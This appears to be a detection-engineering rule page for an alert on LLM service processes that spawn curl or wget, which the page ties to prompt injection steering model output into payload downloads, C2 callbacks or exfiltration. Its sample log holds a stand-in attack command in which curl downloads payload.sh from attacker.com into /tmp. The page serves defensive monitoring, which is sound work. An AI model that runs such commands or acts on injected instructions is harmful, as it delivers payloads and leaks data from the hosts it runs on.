mediumexperimentalLinuxAI/MLNetworkT1071.001

LLM Service Invoking Curl Or Wget Based On Model Output

Detects LLM service processes spawning curl or wget. These download utilities invoked from a model runtime suggest the LLM output or an injected prompt is directing network requests, potentially for C2 callback, payload download, or data exfiltration.

Updated Jan 15, 2025 · Detection Engineering Team

llmimproper-outputlinuxdownloadowasp-llm05

Problem Statement

curl and wget invoked from LLM processes indicate that model output is being treated as trusted directives for network operations. This enables payload delivery, C2 callback, and data exfiltration via prompt injection.

Sample Logs

{"timestamp":"2025-01-15T19:07:44Z","computer_name":"llm-host-03","user":"llm_svc","image":"/usr/bin/curl","command_line":"curl -s http://attacker.com/payload.sh -o /tmp/payload.sh","parent_image":"/opt/llm/app/tool_dispatch.py"}

Required Fields

image

command_line

parent_image

user

computer_name

False Positives

·Approved LLM tool integrations that use curl/wget to fetch data from known APIs

Tuning Guidance

Baseline expected curl/wget destinations for the LLM service. Alert on connections to first-seen or uncategorised hosts.